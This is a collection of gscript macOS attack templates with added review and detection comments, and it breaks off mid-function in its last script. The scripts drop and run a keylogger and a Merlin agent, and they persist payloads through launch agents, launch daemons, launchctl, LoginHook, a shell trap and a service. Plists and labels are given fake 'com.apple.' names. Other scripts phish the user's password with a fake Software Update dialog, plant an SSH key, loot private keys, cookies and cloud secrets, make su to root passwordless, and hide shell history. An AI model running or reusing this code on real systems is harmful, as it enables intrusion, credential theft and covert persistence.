// Defender note: a random-named executable in the temp directory started
// by a root-level parent, plus the output file it is pointed at, are the
// artifacts to look for.
17 | function Deploy() {
18 | console.log("Starting keylogger");
19 | // Drop the sample
20 | var keylogBin = GetAssetAsBytes("keylogger.macho");
// NOTE(review): the asset error is logged but not acted on.
21 | if (keylogBin[1] != null) {
22 | console.log("errors: "+keylogBin[1].Error());
23 | }
24 | 
25 | // get user homedir
26 | var curUser = user.Current();
27 | console.log("Our user is: "+curUser[0].Username);
28 | if (curUser[0].Username == "root") {
29 | // Getting a random name
30 | var temppath = os.TempDir();
31 | var naming = G.rand.GetAlphaString(4);
32 | var name = naming.toLowerCase();
33 | name = temppath+"/"+name;
// The WriteFileFromBytes error return is discarded.
34 | G.file.WriteFileFromBytes(name, keylogBin[0]);
35 | console.log("dropped the keylogger binary here: "+name);
36 | 
37 | // Getting a random outfile
// NOTE(review): the file header says logs go to /var/log/keystroke.log, but
// the path actually passed is n2, a random name under os.TempDir(); whether
// the binary honours that argument is not visible here.
38 | var t2 = os.TempDir();
39 | var n2 = G.rand.GetAlphaString(6);
40 | n2 = n2.toLowerCase();
41 | n2 = t2+"/"+n2;
42 | console.log("writing log file here: "+n2);
43 | 
44 | // Run the command
45 | var runner = G.exec.ExecuteCommandAsync(name, [n2]);
46 | if (runner[1] != null) {
47 | console.log("errors: "+runner[1].Error());
48 | } else {
49 | console.log("pid: "+runner[0].Process.Pid);
50 | }
51 | } else {
52 | console.log("Must be run as root");
53 | }
54 | 
55 | console.log("Done keylogger");
56 | return true;
57 | }
--------------------------------------------------------------------------------
/attack/os_x/launch_agent_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launch Agent Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and a launch agent plist and persist it using Launch Agent
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1159
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os/user as user
12 |
13 | //import:/private/tmp/example.macho
14 | //import:/private/tmp/example_agent.plist
15 |
// File name the dropped launch agent plist is written under (used by Deploy
// to build its /Library/LaunchAgents path). Defender note: the "com.apple."
// prefix is chosen by this script, so it must not be read as a sign of a
// legitimate Apple component.
16 | var plist_name = "com.apple.updates.plist";
17 |
// Deploy: writes the embedded "example.macho" asset to /usr/local/agent_example,
// writes the embedded "example_agent.plist" asset to /Library/LaunchAgents/
// (the system-wide directory, despite the per-user path computed in location1),
// and registers it with `launchctl load -w`. Always returns true.
// Defender note: file creation under /Library/LaunchAgents and a launchctl
// load of a new plist are the auditable events; both happen from the
// implant process.
18 | function Deploy() {
19 | console.log("starting execution of Launch Agent Persistence");
20 | // Prep the asset
21 | var exBin = GetAssetAsBytes("example.macho");
// NOTE(review): asset errors are logged but execution continues regardless.
22 | if (exBin[1] != null) {
23 | console.log("errors: "+exBin[1].Error());
24 | }
25 | // Prep the asset
26 | var exAgent = GetAssetAsBytes("example_agent.plist");
27 | if (exAgent[1] != null) {
28 | console.log("errors: "+exAgent[1].Error());
29 | }
30 | 
31 | // Setup the binary
// NOTE(review): `name` is assigned without `var`, creating an implicit global.
32 | name = "/usr/local/agent_example";
33 | var dropErr = G.file.WriteFileFromBytes(name, exBin[0]);
34 | if (dropErr != null) {
35 | console.log("errors: "+dropErr.Error());
36 | } else {
37 | console.log("dropped the example binary here: "+name);
38 | }
39 | 
40 | // Setup the launch agent
41 | var whoami = user.Current();
42 | var home = whoami[0].HomeDir+"/";
43 | console.log("home Location: "+ home);
// location1 and location2 are computed but never used; only location3 is
// written and loaded. (location1 would also contain a doubled slash, since
// `home` already ends with "/".)
44 | var location1 = home + "/Library/LaunchAgents/" + plist_name;
45 | var location2 = "/System/Library/LaunchAgents/" + plist_name;
46 | var location3 = "/Library/LaunchAgents/" + plist_name;
47 | var dropErr2 = G.file.WriteFileFromBytes(location3, exAgent[0]);
48 | if (dropErr2 != null) {
49 | console.log("errors: "+dropErr2.Error());
50 | } else {
51 | console.log("dropped the agent plist here: "+location3);
52 | }
53 | 
54 | // Persist the agent
// NOTE(review): `exec` is another implicit global. The "Persisted" message is
// printed whenever the go-error slot is null, regardless of exit code (exec[3]).
55 | exec = G.exec.ExecuteCommand("launchctl", ["load", "-w", location3]);
56 | if (exec[4] == null) {
57 | console.log("Persisted binary using launch agent at: "+location3);
58 | console.log("Pid: "+exec[0]);;
59 | console.log("stdout: "+exec[1]);
60 | console.log("stderr: "+exec[2]);
61 | console.log("exit code: "+exec[3]);
62 | } else {
// NOTE(review): `execResp` is not defined in this function (the result is in
// `exec`), so this branch throws a ReferenceError instead of logging the error.
63 | console.log("go errors: "+execResp[4].Error()) ;
64 | }
65 | 
66 | console.log("done, deployed binary with Launch Agent persistence");
67 | return true;
68 | }
--------------------------------------------------------------------------------
/attack/os_x/launch_daemon_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launch Daemon Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and a launch daemon plist and persist it using Launch Daemon
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1160
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os/user as user
12 |
13 | //import:/private/tmp/example.macho
14 | //import:/private/tmp/example_daemon.plist
15 |
// File name the dropped launch daemon plist is written under (used by Deploy
// to build its /Library/LaunchDaemons path). Defender note: the "com.apple."
// prefix is chosen by this script and says nothing about provenance.
16 | var plist_name = "com.apple.updatesd.plist";
17 |
// Deploy: writes the embedded "example.macho" asset to /usr/local/daemon_example,
// writes the embedded "example_daemon.plist" asset to /Library/LaunchDaemons/,
// and registers it with `launchctl load -w`. Always returns true.
// Defender note: a new plist under /Library/LaunchDaemons followed by a
// launchctl load from the same parent process is the pattern to audit.
18 | function Deploy() {
19 | console.log("Starting Launch Daemon Persistence");
20 | 
21 | // Prep the asset
22 | var exBin = GetAssetAsBytes("example.macho");
// NOTE(review): asset errors are logged but execution continues regardless.
23 | if (exBin[1] != null) {
24 | console.log("errors: "+exBin[1].Error());
25 | }
26 | // Prep the asset
27 | var exDaemon = GetAssetAsBytes("example_daemon.plist");
28 | if (exDaemon[1] != null) {
29 | console.log("errors: "+exDaemon[1].Error());
30 | }
31 | 
32 | // Setup the binary
// NOTE(review): `name` is assigned without `var` -- an implicit global.
33 | name = "/usr/local/daemon_example";
34 | var dropErr = G.file.WriteFileFromBytes(name, exBin[0]);
35 | if (dropErr != null) {
36 | console.log("errors: "+dropErr.Error());
37 | } else {
38 | console.log("dropped the example binary here: "+name);
39 | }
40 | 
41 | // Setup the launch daemon
// `whoami` and `location1` are computed but never used; only location2 is
// written and loaded.
42 | var whoami = user.Current();
43 | //var home = whoami[0].HomeDir+"/";
44 | var location1 = "/System/Library/LaunchDaemons/" + plist_name;
45 | var location2 = "/Library/LaunchDaemons/" + plist_name;
46 | var dropErr2 = G.file.WriteFileFromBytes(location2, exDaemon[0]);
47 | if (dropErr2 != null) {
48 | console.log("errors: "+dropErr2.Error());
49 | } else {
50 | console.log("dropped the agent plist here: "+location2);
51 | }
52 | 
53 | // Persist the daemon
// NOTE(review): `exec` is an implicit global. Success is reported whenever the
// go-error slot is null, irrespective of the exit code in exec[3]; the message
// also still says "launch agent" (copied from the agent script).
54 | exec = G.exec.ExecuteCommand("launchctl", ["load", "-w", location2]);
55 | if (exec[4] == null) {
56 | console.log("Persisted binary using launch agent at: "+location2);
57 | console.log("Pid: "+exec[0]);;
58 | console.log("stdout: "+exec[1]);
59 | console.log("stderr: "+exec[2]);
60 | console.log("exit code: "+exec[3]);
61 | } else {
// NOTE(review): `execResp` is undefined here (the result lives in `exec`), so
// this branch throws a ReferenceError rather than logging the error.
62 | console.log("go errors: "+execResp[4].Error()) ;
63 | }
64 | 
65 | console.log("Done Launch Daemon persistence");
66 | return true;
67 | }
68 |
--------------------------------------------------------------------------------
/attack/os_x/launchctl_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launchctl Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using Launchctl
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1152
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
13 | //import:/private/tmp/example.macho
14 |
// Declared at file level but never read or assigned by Deploy below, which
// builds its own local `label` and passes no extra binary arguments.
15 | var labelname;
16 | var binary_args = "";
17 |
// Deploy: writes the embedded "example.macho" asset to /usr/local/<4 random
// lowercase letters> (the os.TempDir() alternative is commented out) and
// registers it with `launchctl submit -l com.apple.<6 random letters>`.
// Always returns true.
// Defender note: a `launchctl submit` with a freshly generated label and a
// new random-named file under /usr/local are the auditable artifacts.
18 | function Deploy() {
19 | console.log("Starting execution of Launchctl Persistence");
20 | // Prep the asset
21 | var exampBin = GetAssetAsBytes("example.macho");
// NOTE(review): the asset error is logged but execution continues regardless.
22 | if (exampBin[1] != null) {
23 | console.log("errors: "+exampBin[1].Error());
24 | }
25 | 
26 | // Getting a random name
27 | //var temppath = os.TempDir();
28 | var temppath = "/usr/local";
29 | var naming = G.rand.GetAlphaString(4);
30 | var name = naming.toLowerCase();
31 | name = temppath+"/"+name;
// The write error is discarded, and the log line below still says
// "keylogger binary" -- copied from keylogger_example.gs; it drops example.macho.
32 | G.file.WriteFileFromBytes(name, exampBin[0]);
33 | console.log("dropped the keylogger binary here: "+name);
34 | 
35 | // Persist the sample
36 | var label = G.rand.GetAlphaString(6);
37 | label = label.toLowerCase();
38 | label = "com.apple."+label;
// Success is reported whenever the go-error slot is null, regardless of the
// exit code in exec[3].
39 | var exec = G.exec.ExecuteCommand("launchctl", ["submit", "-l", label, "--", name]);
40 | if (exec[4] == null) {
41 | console.log("Persisted binary using launchctl, with the label: "+label);
42 | console.log("Pid: "+exec[0]);;
43 | console.log("stdout: "+exec[1]);
44 | console.log("stderr: "+exec[2]);
45 | console.log("exit code: "+exec[3]);
46 | } else {
47 | console.log("go errors: "+exec[4].Error()) ;
48 | }
49 | console.log("Done execution of Launchctl Persistence");
50 | return true;
51 | }
--------------------------------------------------------------------------------
/attack/os_x/loginhook_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: LoginHook Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a default Login Hook
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/techniques/T1164/
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
13 | //import:/private/tmp/example.macho
14 |
// Deploy: writes the embedded "example.macho" asset to /usr/local/<4 random
// lowercase letters> and points the com.apple.loginwindow LoginHook default
// at it via `defaults write`. Always returns true.
// Defender note: any write of a LoginHook key to com.apple.loginwindow, and a
// new random-named file under /usr/local, are the observable changes.
15 | function Deploy() {
16 | 
17 | console.log("Starting Login Hook Persistence");
18 | 
19 | // Prep the asset
20 | var exampBin = GetAssetAsBytes("example.macho");
// NOTE(review): the asset error is logged but execution continues regardless.
21 | if (exampBin[1] != null) {
22 | console.log("errors: "+exampBin[1].Error());
23 | }
24 | 
25 | // Getting a random name
26 | //var temppath = os.TempDir();
27 | var temppath = "/usr/local";
28 | var naming = G.rand.GetAlphaString(4);
29 | var name = naming.toLowerCase();
30 | name = temppath+"/"+name;
// The write error is discarded; the log line still says "keylogger binary"
// although this script drops example.macho.
31 | G.file.WriteFileFromBytes(name, exampBin[0]);
32 | console.log("dropped the keylogger binary here: "+name);
33 | 
34 | // Persist the sample
// NOTE(review): `exec` is assigned without `var` (implicit global). Success is
// reported whenever the go-error slot is null, regardless of exec[3].
35 | exec = G.exec.ExecuteCommand("defaults", ["write", "com.apple.loginwindow", "LoginHook", name]);
36 | if (exec[4] == null) {
37 | console.log("Persisted binary using com.apple.loginwindow LoginHook");
38 | console.log("Pid: "+exec[0]);
39 | console.log("stdout: "+exec[1]);
40 | console.log("stderr: "+exec[2]);
41 | console.log("exit code: "+exec[3]);
42 | } else {
// NOTE(review): `execResp` is undefined in this function (the result is in
// `exec`), so this branch throws a ReferenceError instead of logging.
43 | console.log("go errors: "+execResp[4].Error());
44 | }
45 | 
46 | console.log("Done Login Hook Persistence");
47 | return true;
48 | }
49 |
--------------------------------------------------------------------------------
/attack/os_x/looter_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GLoot
3 | // Author: ahhh
4 | // Purpose: Searches for files and can zip+encrypt them
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:180
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/ahhh/gloot as loot
13 |
14 |
// Deploy: calls loot.Searcher over /Users/ with the name/content filters
// below, then zips the matches to /private/tmp/ozz with the fixed password
// "testing" via loot.ZipFiles. Always returns true.
// Defender note: the only artifact written by this script is /private/tmp/ozz;
// the search itself is a broad read of /Users/ by the implant process.
15 | function Deploy() {
16 | console.log("Starting GLoot");
17 | 
18 | // Search filters: names/contents to skip, names/contents that select a file
19 | var ignoreNames = ["Keychains", ".vmdk", ".vmem", ".npm", ".vscode", ".dmg", "man1", ".ova", ".iso"];
20 | var ignoreContent = ["golang.org/x/crypto"];
21 | var includeNames = ["Cookies"];
22 | var includeContent = ["BEGIN DSA PRIVATE KEY", "BEGIN RSA PRIVATE KEY", "secret_access_key"];
23 | 
// NOTE(review): `goods` is string-concatenated into the log; what that prints
// depends on the type loot.Searcher returns, which is not visible here.
24 | var goods = loot.Searcher("/Users/", ignoreNames, ignoreContent, includeNames, includeContent);
25 | console.log("the goods: "+ goods);
26 | 
27 | // Pickup our prompter pw
28 | //goods.push("/private/tmp/gscript_special.txt");
29 | 
30 | var file_location = "/private/tmp/ozz";
31 | var errs = loot.ZipFiles(file_location, goods, "testing");
32 | if (errs != null) {
33 | console.log("errors: "+errs.Error());
34 | } else {
35 | console.log("file newly created: " + file_location);
36 | }
37 | 
38 | console.log("Done GLoot");
39 | return true;
40 | }
--------------------------------------------------------------------------------
/attack/os_x/merlin_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
13 | //import:/private/tmp/merlinagent.macho
14 |
15 |
// Deploy: writes the embedded "merlinagent.macho" asset to a random 4-letter
// lowercase name under os.TempDir() and launches it asynchronously with
// `-url https://example.com/` (a placeholder). Always returns true.
// Defender note: a random-named executable in the temp directory spawned by
// the implant process, followed by outbound HTTPS from that child.
16 | function Deploy() {
17 | console.log("Starting to drop merlin binary");
18 | 
19 | // Getting our asset
20 | var merlinBin = GetAssetAsBytes("merlinagent.macho");
// NOTE(review): asset and write errors are logged but execution continues.
21 | if (merlinBin[1] != null) {
22 | console.log("errors: "+merlinBin[1].Error());
23 | }
24 | 
25 | // Getting a random path
26 | var temppath = os.TempDir();
27 | var naming = G.rand.GetAlphaString(4);
28 | naming = temppath + "/" + naming.toLowerCase();
29 | console.log("file name: "+ naming);
30 | 
31 | // Write payload
32 | var errors = G.file.WriteFileFromBytes(naming, merlinBin[0]);
33 | if (errors != null) {
34 | console.log("errors: "+errors.Error());
35 | }
36 | 
37 | // Run payload
38 | var running = G.exec.ExecuteCommandAsync(naming, ["-url", "https://example.com/"]);
39 | if (running[1] != null) {
40 | console.log("errors: "+running[1].Error());
41 | } else {
42 | console.log("pid: "+running[0].Process.Pid);
43 | }
44 | 
// Relies on automatic semicolon insertion; every other return on this page ends in ";".
45 | return true
46 | }
--------------------------------------------------------------------------------
/attack/os_x/merlin_example2.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //import:/private/tmp/merlinagent.macho
12 |
13 |
// Deploy: variant of merlin_example.gs that reads the "merlinagent.macho"
// asset as a string, writes it to /private/tmp/<10 random lowercase letters>
// with WriteFileFromString, and launches it asynchronously. Always returns true.
// Every error slot is logged unconditionally and nothing is checked.
14 | function Deploy() {
15 | console.log("Starting to drop merlin binary");
16 | 
17 | // Getting our asset
// NOTE(review): a Mach-O binary is round-tripped through a string here; whether
// that preserves the bytes depends on the gscript helpers, which is not visible.
18 | var merlinBin = GetAssetAsString("merlinagent.macho");
19 | console.log("errors: "+merlinBin[1]);
20 | 
21 | // Getting a random string
22 | var basepath = "/private/tmp/";
23 | var naming = G.rand.GetAlphaString(10);
24 | naming = naming.toLowerCase();
25 | var fullpath = basepath+naming;
26 | console.log("file name: "+ fullpath);
27 | 
28 | var errors = G.file.WriteFileFromString(fullpath, merlinBin[0]);
29 | console.log("errors: "+errors);
30 | 
// [""] passes a single empty-string argument, not an empty argv.
31 | var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
32 | console.log("errors: "+running[1]);
33 | 
34 | return true
35 | }
--------------------------------------------------------------------------------
/attack/os_x/osascript_prompt.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Osascript Prompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password with the builtin Osascript
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1141
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Deploy: runs osascript with two inline AppleScript snippets -- activate
// System Preferences, then show a "Software Update" dialog with a hidden
// answer field -- and logs the command result. Always returns true.
// Defender note: an osascript process with `display dialog ... with hidden
// answer` launched from a non-GUI parent is the observable behaviour.
11 | function Deploy() {
12 | console.log("Starting osascript prompt")
13 | var first = 'tell app "System Preferences" to activate';
14 | var second = 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"';
// NOTE(review): `first` is passed twice ("-e", first, "-e", first); presumably
// one of the pairs is a copy-paste leftover.
15 | var response = G.exec.ExecuteCommand("osascript", ["-e", first, "-e", first, "-e", second]);
16 | console.log("Pid: "+response[0]);
17 | console.log("stdout: "+response[1]);
18 | console.log("stderr: "+response[2]);
19 | console.log("exit code: "+response[3]);
// The go-error slot is printed without the null check used by sibling scripts.
20 | console.log("go errors: "+response[4]);
21 | return true;
22 | }
23 |
24 |
--------------------------------------------------------------------------------
/attack/os_x/prompter_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GPrompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:80
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/gen2brain/dlgs as dlgs
13 |
14 |
// Deploy: shows a dlgs.Password dialog titled "System Preferences" and writes
// whatever is in passwd[0] to os.TempDir()/gscript_special.txt (the same file
// name looter_example.gs references in a commented-out line). Always returns true.
// Defender note: a native password dialog raised by a non-GUI process plus a
// new gscript_special.txt file in the temp directory are the artifacts.
15 | function Deploy() {
16 | console.log("Starting GPrompt");
17 | 
18 | // Prompt for the pw
// NOTE(review): `passwd` is assigned without `var` (implicit global). The
// length==3 check suggests a [value, ok, err] shape, but that is inferred.
19 | passwd = dlgs.Password("System Preferences", "Enter your password to continue: ");
20 | if (passwd.length == 3) {
21 | if (passwd[2] != null) {
22 | console.log("errors: "+passwd[2].Error());
23 | } else {
24 | console.log("User input: " + passwd[0]);
25 | }
26 | } else {
27 | console.log("dlgs didn't execute right")
28 | }
29 | 
30 | // Getting a file to save the output
31 | var temppath = os.TempDir();
32 | //var temppath = "/usr/local";
33 | //var naming = G.rand.GetAlphaString(5);
34 | var naming = "gscript_special.txt"
35 | var name = naming.toLowerCase();
36 | name = temppath+"/"+name;
// NOTE(review): passwd[0] is written even when the dialog errored or returned an
// unexpected shape above; only the write error itself is checked.
37 | var dropErr = G.file.WriteFileFromString(name, passwd[0]);
38 | if (dropErr != null) {
39 | console.log("errors: "+dropErr.Error());
40 | } else {
41 | console.log("dropped the pw here: "+name);
42 | }
43 | 
44 | console.log("Done GPrompt");
45 | return true;
46 | }
--------------------------------------------------------------------------------
/attack/os_x/sshkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Title: SSH Key Persistence
2 | // Author: micahjmartin
3 | // Purpose: add a public ssh key to user accounts
4 | // Gscript version: 1.0.0
5 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1145
6 | // Note: Assumes ssh key access is already enabled
7 |
8 | //priority:110
9 | //timeout:75
10 |
11 | //go_import:os as os
12 | //go_import:os/user as user
13 |
14 | //import:/private/tmp/id_rsa.pub
15 |
// Deploy: adds the embedded "id_rsa.pub" asset to the current user's
// ~/.ssh/authorized_keys (or /var/root/.ssh/authorized_keys when running as
// root), creating the .ssh directory and the file if they do not exist and
// appending otherwise. Always returns true.
// Defender note: creation of or appends to authorized_keys by a process other
// than an interactive shell or ssh tooling is the event to alert on.
16 | function Deploy() {
17 | console.log("Started SSH key persistence!")
18 | 
19 | // Getting our asset
20 | var pubKey = GetAssetAsBytes("id_rsa.pub");
// NOTE(review): the asset error is logged but execution continues regardless.
21 | if (pubKey[1] != null) {
22 | console.log("errors: "+pubKey[1].Error());
23 | }
24 | 
25 | // get user homedir
26 | var myUser = user.Current();
27 | console.log(myUser[0].Username);
28 | var homeydir = myUser[0].HomeDir+"/";
// root's HomeDir is overridden with a fixed /var/root/ path.
29 | if (myUser[0].Username == "root")
30 | {
31 | homeydir = "/var/root/";
32 | }
33 | 
34 | // make .ssh dir
// The mkdir result is discarded; a failure here surfaces only as a write error below.
35 | var dirname = homeydir+".ssh/";
36 | var dirstat = G.file.CheckExists(dirname);
37 | if (dirstat == false) {
38 | G.exec.ExecuteCommand("/bin/mkdir", [dirname]);
39 | }
40 | 
41 | //make or add to authorize keys file
42 | var filename = homeydir + ".ssh/authorized_keys";
43 | var stat = G.file.CheckExists(filename);
44 | if (stat == false) {
// NOTE(review): `errors` is assigned without `var` (implicit global).
45 | errors = G.file.WriteFileFromBytes(filename, pubKey[0]);
46 | if (errors != null) {
47 | console.log("errors: "+errors.Error());
48 | } else {
49 | console.log("SSH key added");
50 | }
51 | } else {
// NOTE(review): the key bytes are appended as-is; if the existing file does not
// end in a newline the key is glued to the last line -- cannot confirm from here
// whether AppendFileBytes or the asset takes care of that.
52 | var appendedFileError = G.file.AppendFileBytes(filename, pubKey[0]);
53 | if (appendedFileError != null) {
54 | console.log("errors: "+appendedFileError.Error());
55 | } else {
56 | console.log("SSH key appended");
57 | }
58 | }
59 | console.log("Done SSH key persistence!");
60 | return true;
61 | }
62 |
--------------------------------------------------------------------------------
/attack/os_x/su_pam_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Su pam Persistence
3 | // Author: ahhh
// Purpose: replaces the pam_rootok.so directive in /etc/pam.d/su with pam_permit.so, so that su to root authenticates successfully for any caller
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //priority:100
10 | //timeout:150
11 |
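// Deploy swaps "pam_rootok.so" for "pam_permit.so" in /etc/pam.d/su. The
// first auth line of the su stack then always succeeds, i.e. any local user
// can `su` to root without a password. Needs root (see header Note).
// Returns false when the replace reports an error; the original printed
// "errors: null" unconditionally and always returned true.
function Deploy() {
  console.log("starting execution of Su Persistence");

  var replaceError = G.file.ReplaceInFileWithString("/etc/pam.d/su", "pam_rootok.so", "pam_permit.so");
  // Assumes the single return value is a Go error (nil -> null/undefined),
  // like the other G.file writers in this repo.
  if (replaceError != null) {
    console.log("errors: "+ replaceError);
    return false;
  }
  // NOTE(review): presumably no error is raised when the pattern is absent,
  // so a su stack that already differs would be silently left untouched.
  console.log("done Su Persistence");
  return true;
}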
21 |
--------------------------------------------------------------------------------
/attack/os_x/tamper_histcontrol.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Tamper Histcontrol
3 | // Author: ahhh
4 | // Purpose: sets HISTCONTROL=ignorespace for bash shells,
5 | // such that a malicious user can launch new terminals and use a single space before a command to evade the history file
6 | // Gscript version: 1.0.0
7 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1148
8 |
9 | //go_import:os/user as user
10 | //go_import:os as os
11 |
12 | //priority:150
13 | //timeout:150
14 |
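// Deploy writes "HISTCONTROL=ignorespace" into the current user's
// ~/.bash_profile (appending if it exists, creating it otherwise) so that
// commands typed with a leading space are kept out of the history file.
// HISTCONTROL is read by bash itself, so no export is needed for the login
// shell that sources the file. Only bash login shells read .bash_profile;
// a zsh default shell (recent macOS) is unaffected.
// Returns false when the user lookup or the file write fails.
function Deploy() {
  console.log("Starting Tamper Histcontrol");

  // Leading newline: the existing profile may not end with one, and the
  // original append could glue this assignment onto its last line.
  var histcontrol = "\nHISTCONTROL=ignorespace \n";

  // user.Current() is assumed to return [User, err].
  var whoami = user.Current();
  if (whoami[1] != null) {
    console.log("errors: "+whoami[1].Error());
    return false;
  }
  var file_location = whoami[0].HomeDir+"/.bash_profile";
  console.log("File Location: "+ file_location);

  var writeErr;
  if (G.file.CheckExists(file_location) == true) {
    writeErr = G.file.AppendFileString(file_location, histcontrol);
    if (writeErr == null) {
      console.log("file already exists so appended: " + file_location);
    }
  } else {
    writeErr = G.file.WriteFileFromString(file_location, histcontrol);
    if (writeErr == null) {
      console.log("file newly created: " + file_location);
    }
  }
  if (writeErr != null) {
    console.log("errors: "+writeErr.Error());
    return false;
  }
  console.log("Done Tamper Histcontrol");
  return true;
}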
43 |
--------------------------------------------------------------------------------
/attack/os_x/trap_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Trap Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using Trap
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1154
7 |
8 | //priority:90
9 | //timeout:150
10 |
//go_import:os as os
//go_import:os/user as user
12 |
13 | //import:/private/tmp/example.macho
14 |
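// Deploy drops the embedded Mach-O (asset "example.macho") under the temp
// directory with a random 4-letter name and appends a `trap <path> 2` line
// to ~/.bash_profile, so every bash login shell runs the binary when it
// receives SIGINT (Ctrl-C).
// Returns false when the asset, the user lookup or a write fails (the
// original carried on after each error and still returned true).
// The script calls os.TempDir(), so `os` must be brought in with
// //go_import:os as os in the header like the sibling scripts do.
function Deploy() {
  console.log("Starting Trap Persistence");

  var exampleBin = GetAssetAsBytes("example.macho");
  if (exampleBin[1] != null) {
    console.log("errors: "+exampleBin[1].Error());
    return false;
  }

  // Random lowercase name inside the temp dir (per-user $TMPDIR on macOS).
  var temppath = os.TempDir();
  var name = temppath+"/"+G.rand.GetAlphaString(4).toLowerCase();
  var dropErr = G.file.WriteFileFromBytes(name, exampleBin[0]);
  if (dropErr != null) {
    console.log("errors: "+dropErr.Error());
    return false;
  }
  console.log("dropped the example binary here: "+name);
  // The trap hands the path to the shell, so the file needs its exec bit;
  // the mode WriteFileFromBytes uses is not visible here, so set it.
  G.exec.ExecuteCommand("/bin/chmod", ["+x", name]);

  // Leading newline so the line is not fused onto an unterminated last
  // line of an existing profile.
  var trap_string = "\ntrap " + name + " 2 \n";

  var whoami = user.Current();
  if (whoami[1] != null) {
    console.log("errors: "+whoami[1].Error());
    return false;
  }
  var file_location = whoami[0].HomeDir+"/.bash_profile";
  console.log("File Location: "+ file_location);

  var writeErr;
  if (G.file.CheckExists(file_location) == true) {
    writeErr = G.file.AppendFileString(file_location, trap_string);
    if (writeErr == null) {
      console.log("file already exists so appended: " + file_location);
    }
  } else {
    writeErr = G.file.WriteFileFromString(file_location, trap_string);
    if (writeErr == null) {
      console.log("file newly created: " + file_location);
    }
  }
  if (writeErr != null) {
    console.log("errors: "+writeErr.Error());
    return false;
  }
  console.log("Persisted binary using SIGINT trap: "+ name);
  console.log("Done Trap persistence");
  return true;
}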
64 |
--------------------------------------------------------------------------------
/attack/os_x/xsvc_service_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: x/svc Service Persistence Example
3 | // Author: ahhh
// Purpose: Uses the experimental x/svc library to install and start a service for persistence
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1050
7 |
8 | //priority:170
9 | //timeout:170
10 |
11 | //go_import:github.com/gen0cide/gscript/x/svc as svc
12 |
13 | //import:/private/tmp/example_svc.bin
14 |
// Where the service binary is written. /usr/local is typically root-owned,
// so Deploy is expected to run with root privileges.
var service_bin_path = "/usr/local/svctest";

// Service definition passed to svc.NewFromJSON; the keys are the library's
// JSON field names.
var serviceSettings = {
  "name": "gscript_example_service",
  "display_name": "ges",
  "description": "gscript example service",
  "arguments": [],
  "executable_path": service_bin_path,
  "working_directory": "/usr/local/",
  "options": {}
};
26 |
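// Deploy writes the embedded service binary to service_bin_path, builds a
// service from serviceSettings, validates it, installs it and starts it.
// Returns false at the first failing step (each failure also drops into
// DebugConsole(), as in the original; that blocks on an interactive console
// and should be removed for a real deployment).
// Fixes over the original: the asset error was never checked, installchk /
// startchk leaked as implicit globals, and a config check that returned
// false without an error dereferenced a missing error object.
function Deploy() {
  console.log("Starting gscript x/svc persistence example");

  console.log("Writing binary to disk...");
  var filedata = GetAssetAsBytes("example_svc.bin");
  if (filedata[1] != null) {
    console.error("Error reading asset: " + filedata[1].Error());
    DebugConsole();
    return false;
  }
  // `!= null` covers both null and undefined, whichever a nil Go error maps to.
  var errchk = G.file.WriteFileFromBytes(service_bin_path, filedata[0]);
  if (errchk != null) {
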